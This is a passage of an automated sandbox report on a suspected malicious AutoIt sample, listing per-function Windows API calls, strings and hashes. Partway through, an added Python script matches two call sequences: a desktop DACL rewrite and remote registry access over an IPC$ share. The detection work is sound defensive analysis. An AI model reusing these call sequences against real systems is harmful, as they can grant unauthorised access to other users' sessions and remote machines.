                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0076AA2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                                    • Opcode ID: ba32e9a718886843eb1dfa2364ccfc5d25d897c18d43115034e9c047a8de63ca
                                                                                                                                                    • Instruction ID: 5cf4610ad8e13c37687badcc4952cc43c69dd1f00765e52a9059acb95afcad74
                                                                                                                                                    • Opcode Fuzzy Hash: ba32e9a718886843eb1dfa2364ccfc5d25d897c18d43115034e9c047a8de63ca
                                                                                                                                                    • Instruction Fuzzy Hash: EA511CB1900209BBDF14DF94DD85EEEBB79FF04304F14822AE916E6291EB399905CF61
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 2889450990-2391861430
                                                                                                                                                    • Opcode ID: 3a21cb9793fb155c044d1c17e92cc554151ea5ece6c77de52aa88ab6353a39d6
                                                                                                                                                    • Instruction ID: 375ed8befdc7c36327c914d895eb08452f36747faca51fcbfa2b475f2c3d3dcc
                                                                                                                                                    • Opcode Fuzzy Hash: 3a21cb9793fb155c044d1c17e92cc554151ea5ece6c77de52aa88ab6353a39d6
                                                                                                                                                    • Instruction Fuzzy Hash: 2D516D71900109FADF25EBA0CD4AEEEB778AF08344F108169F505720A2EB796F59DB61
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 2889450990-3420473620
                                                                                                                                                    • Opcode ID: f3f79f6f71463c5feaea493bb50289fa5a75190bdb0d37133d18ae2959898af2
                                                                                                                                                    • Instruction ID: 116bcf18159ff0c6cce5a0cab85d89092c47f34cee74704bba3468b4ed5a6e01
                                                                                                                                                    • Opcode Fuzzy Hash: f3f79f6f71463c5feaea493bb50289fa5a75190bdb0d37133d18ae2959898af2
                                                                                                                                                    • Instruction Fuzzy Hash: C1518071900109FADF16EBE0DD4AEEEB778AF08340F504069B50972062EB796F59DF61
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: $E~$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                    • API String ID: 3964851224-1783115620
                                                                                                                                                    • Opcode ID: d3de235dbcc7a37b9f8657dcc353c2fb38eb6814cf38927f2706b5092999defd
                                                                                                                                                    • Instruction ID: c829283437ba7f7f2caeeeaa71a51057bad948ad6e83f5657a83aa7afbafafde
                                                                                                                                                    • Opcode Fuzzy Hash: d3de235dbcc7a37b9f8657dcc353c2fb38eb6814cf38927f2706b5092999defd
                                                                                                                                                    • Instruction Fuzzy Hash: 6141833060028ACBDF10EF11E895AEB3365FF16354F104465FC555B296EB7CAE1ACB60
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007755D7
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00775664
                                                                                                                                                    • GetMenuItemCount.USER32(007F1708), ref: 007756ED
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000005,00000000,000000F5,?,?), ref: 0077577D
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000004,00000000), ref: 00775785
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000006,00000000), ref: 0077578D
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000003,00000000), ref: 00775795
                                                                                                                                                    • GetMenuItemCount.USER32(007F1708), ref: 0077579D
                                                                                                                                                    • SetMenuItemInfoW.USER32(007F1708,00000004,00000000,00000030), ref: 007757D3
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 007757DD
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 007757E6
                                                                                                                                                    • TrackPopupMenuEx.USER32(007F1708,00000000,?,00000000,00000000,00000000), ref: 007757F9
                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00775805
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3993528054-0
                                                                                                                                                    • Opcode ID: c66ddd3f385fb5362a7e1466cb6cd951d9bcd3469418d067124fca778d7d54b5
                                                                                                                                                    • Instruction ID: 3e370395d9e8ebe23f702008d922375c535c9f85f14edf22684f3884cebd6057
                                                                                                                                                    • Opcode Fuzzy Hash: c66ddd3f385fb5362a7e1466cb6cd951d9bcd3469418d067124fca778d7d54b5
                                                                                                                                                    • Instruction Fuzzy Hash: 1C71D170640605FEEF249B54CC49FAABF65FF017A8F248219F51CAA1D1C7B96C20DBA4
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0076A1DC
                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0076A211
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0076A22D
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0076A249
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0076A273
                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0076A29B
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076A2A6
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076A2AB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                    • API String ID: 1687751970-22481851
                                                                                                                                                    • Opcode ID: 01577e713feca3d2d2c219f2cabbdadf1b43d06bf2fd0b4be92a4f4aad0c3cf0
                                                                                                                                                    • Instruction ID: 0431541f790b86cfff271e2092de8321107a3cca0a076aa12862b28289b50028
                                                                                                                                                    • Opcode Fuzzy Hash: 01577e713feca3d2d2c219f2cabbdadf1b43d06bf2fd0b4be92a4f4aad0c3cf0
                                                                                                                                                    • Instruction Fuzzy Hash: 7D41C576C1122DABDB25EBA4DC95DEDB7B8BF08710F004129E902B3162EB799E05CF51
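Two of the call sequences listed above are worth matching automatically when triaging reports of this kind. The first is the user-object DACL rewrite ending in SetUserObjectSecurity with SecurityInformation 00000004 (DACL_SECURITY_INFORMATION): GetUserObjectSecurity, GetSecurityDescriptorDacl, GetAce/AddAce to copy the existing ACEs and append one for a new SID, SetSecurityDescriptorDacl, SetUserObjectSecurity. That is the standard way of granting another account access to the interactive window station and desktop before starting a process as that user. The second maps a remote share with WNetAddConnection2W (the \IPC$ string in the listing), attaches to the remote machine's HKEY_LOCAL_MACHINE (80000002) with RegConnectRegistryW, opens SOFTWARE\Classes\ with KEY_READ (00020019) and resolves a ProgID to its \CLSID value via CLSIDFromString. One caveat for a compiled AutoIt binary: much of the listed code is interpreter runtime rather than script logic (the "Line %d (File "%s"):" error strings above are the runtime's), so a hit on either sequence describes a capability of the interpreter, not necessarily an action of this sample.

The Python below is an added example, not Joe Sandbox code and not code from the sample. It parses "APIs" bullets in the format shown in these listings and reports which of the two sequences is present. The embedded input is copied from the two function listings above; the signature names, function names and the ordered-subsequence matching rule are choices made for this example, not definitions from the report.

```python
"""Match Joe Sandbox 'APIs' bullets against call-sequence signatures (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# One bullet from a function's "APIs" list. Three shapes occur in the report:
#   • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0076AA2F
#   • Part of subcall function 0076ABBB: HeapAlloc.KERNEL32(00000000,?), ref: 0076ABF7
#   • _memset.LIBCMT ref: 0076A8E0          (CRT calls carry no argument list)
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # raw argument text; '?' means the plugin could not resolve it
    ref: Optional[str]      # address of the call site
    subcall: Optional[str]  # set for "Part of subcall function X" lines

def parse_api_lines(text: str) -> list:
    """Turn the bullets of one function listing into ApiCall records, skipping everything else."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls

def hex_arg(arg: str) -> Optional[int]:
    """Resolved immediates are printed as hex digits; '?' and other placeholders yield None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

# Ordered subsequences; heap and CRT calls between the named ones are tolerated. Names are ours.
SIGNATURES = {
    "user_object_dacl_rewrite": (
        "GetUserObjectSecurity", "GetSecurityDescriptorDacl", "AddAce",
        "SetSecurityDescriptorDacl", "SetUserObjectSecurity"),
    "remote_registry_via_ipc_share": (
        "WNetAddConnection2W", "RegConnectRegistryW", "RegOpenKeyExW",
        "RegQueryValueExW", "CLSIDFromString"),
}

def contains_sequence(calls, wanted) -> bool:
    """True when every name in `wanted` appears, in that order, among the call names."""
    names = iter(c.api for c in calls)
    return all(w in names for w in wanted)

def match_signatures(calls) -> list:
    return [name for name, seq in SIGNATURES.items() if contains_sequence(calls, seq)]

DACL_SECURITY_INFORMATION = 0x4  # SECURITY_INFORMATION bit in SetUserObjectSecurity's 2nd argument

def rewrites_user_object_dacl(calls) -> bool:
    """AddAce followed by a SetUserObjectSecurity that actually writes the DACL (bit 0x4 set)."""
    seen_addace = False
    for c in calls:
        if c.api == "AddAce":
            seen_addace = True
        elif c.api == "SetUserObjectSecurity" and seen_addace and len(c.args) >= 2:
            v = hex_arg(c.args[1])
            if v is not None and v & DACL_SECURITY_INFORMATION:
                return True
    return False

PREDEFINED_HKEYS = {  # documented HKEY_* pseudo-handles
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

def remote_registry_hives(calls) -> list:
    """Name the predefined hive each RegConnectRegistryW attaches to on the remote machine."""
    return [PREDEFINED_HKEYS.get(hex_arg(c.args[1]), "unknown")
            for c in calls if c.api == "RegConnectRegistryW" and len(c.args) >= 2]

# Input copied from the two function listings in this report (bullets only).
DACL_LISTING = """\
• Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
• Part of subcall function 0076AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0076A6B5,?), ref: 0076AC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0076A8CB
• _memset.LIBCMT ref: 0076A8E0
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0076A8FF
• GetAce.ADVAPI32(?,00000000,?), ref: 0076A94D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0076A969
• CopySid.ADVAPI32(00000000), ref: 0076A9C4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0076A9F5
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0076AA1B
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0076AA2F
"""
REMOTE_REG_LISTING = """\
• _memset.LIBCMT ref: 0076A1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0076A211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0076A22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\\Classes\\), ref: 0076A249
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\\Classes\\), ref: 0076A273
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\\Classes\\), ref: 0076A29B
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\\Classes\\), ref: 0076A2A6
"""

if __name__ == "__main__":
    for label, text in (("DACL listing", DACL_LISTING), ("remote registry listing", REMOTE_REG_LISTING)):
        calls = parse_api_lines(text)
        print(f"{label}: {len(calls)} calls, signatures={match_signatures(calls)}, "
              f"dacl_rewrite={rewrites_user_object_dacl(calls)}, hives={remote_registry_hives(calls)}")
```

Matching on ordered subsequences rather than adjacent calls is deliberate: the listings interleave GetProcessHeap/HeapAlloc/_memset between the calls that matter, and a signature that demanded adjacency would miss every one of them. Feeding a whole report's "APIs" bullets through parse_api_lines gives one call list per function only if the listings are split first; across a full page the matcher will also fire on any function whose calls happen to contain the sequence in order.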
                                                                                                                                                    APIs
                                                                                                                                                    • __swprintf.LIBCMT ref: 007767FD
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077680A
                                                                                                                                                      • Part of subcall function 0075172B: __woutput_l.LIBCMT ref: 00751784
                                                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00776834
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00776840
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0077684D
                                                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0077686D
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0077687F
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0077688E
                                                                                                                                                    • LockResource.KERNEL32(?), ref: 0077689A
                                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007768F9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                    • String ID: 5~
                                                                                                                                                    • API String ID: 1433390588-4055697937
                                                                                                                                                    • Opcode ID: fa77c62e1666f29a0c98b4abb503c8eb91b4fd69cb849bc8b0f865687fc86699
                                                                                                                                                    • Instruction ID: f64ed1511985ff169c185bf6f710374d7d87272ac8baba21e20afb57fcb385eb
                                                                                                                                                    • Opcode Fuzzy Hash: fa77c62e1666f29a0c98b4abb503c8eb91b4fd69cb849bc8b0f865687fc86699
                                                                                                                                                    • Instruction Fuzzy Hash: B931AE7190065AABDF109F61DD88EFA7BA8FF08381F00C525F916E2140E738DD21DBA5
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007A36F4,00000010,?,Bad directive syntax error,007CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007725D6
                                                                                                                                                    • LoadStringW.USER32(00000000,?,007A36F4,00000010), ref: 007725DD
                                                                                                                                                    • _wprintf.LIBCMT ref: 00772610
                                                                                                                                                    • __swprintf.LIBCMT ref: 00772632
                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007726A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                    • API String ID: 1080873982-4153970271
                                                                                                                                                    • Opcode ID: 48d5cdec28a31005290ca1779327ab5f04135d2b8c711aa4e82e25b886be8164
                                                                                                                                                    • Instruction ID: 5a652780357587d4d7209fce02d711f8e256b2c026b86586e5269a72c0cd4d68
                                                                                                                                                    • Opcode Fuzzy Hash: 48d5cdec28a31005290ca1779327ab5f04135d2b8c711aa4e82e25b886be8164
                                                                                                                                                    • Instruction Fuzzy Hash: 35217C7190021EEFDF12AB90CC4EFEE7B78BF18304F004456F515620A3EA79AA29DB51
                                                                                                                                                    APIs
                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00777B42
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00777B58
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00777B69
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00777B7B
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00777B8C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString
                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                    • API String ID: 890592661-1007645807
                                                                                                                                                    • Opcode ID: 34366ecbf2d7c9bbd8bbef9239ea4b39cd8027b3ddc748f2099095984a3cfbc6
                                                                                                                                                    • Instruction ID: 71b4ee87b3969b492fa7049670ef266261329dbed11b23d1b9569753cd9794a6
                                                                                                                                                    • Opcode Fuzzy Hash: 34366ecbf2d7c9bbd8bbef9239ea4b39cd8027b3ddc748f2099095984a3cfbc6
                                                                                                                                                    • Instruction Fuzzy Hash: 4E11C8E0641299B9E724B362CC8EDFF7B7CEB95B40F0004297415A30D1DE780E44C6B0
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00777794
                                                                                                                                                      • Part of subcall function 0074DC38: timeGetTime.WINMM(?,75A8B400,007A58AB), ref: 0074DC3C
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 007777C0
                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007777E4
                                                                                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00777806
                                                                                                                                                    • SetActiveWindow.USER32 ref: 00777825
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00777833
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00777852
                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 0077785D
                                                                                                                                                    • IsWindow.USER32 ref: 00777869
                                                                                                                                                    • EndDialog.USER32(00000000), ref: 0077787A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                    • Opcode ID: c4e0e5cda2444b68cb8e2bd0ca7a10bf6ac6f17d5b8047cf3e5e53693bb1198d
                                                                                                                                                    • Instruction ID: 6c5757993ba21f31508bfb4e9a8984a41d1da09a0d82ba7215f15b1f4075e3db
                                                                                                                                                    • Opcode Fuzzy Hash: c4e0e5cda2444b68cb8e2bd0ca7a10bf6ac6f17d5b8047cf3e5e53693bb1198d
                                                                                                                                                    • Instruction Fuzzy Hash: 66214FB0204205AFEB299B30EC8DF363F69FF44389B00C134F51986162EB7D5D10DA69
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0078034B
                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007803DE
                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 007803F2
                                                                                                                                                    • CoCreateInstance.OLE32(007BDA8C,00000000,00000001,007E3CF8,?), ref: 0078043E
                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007804AD
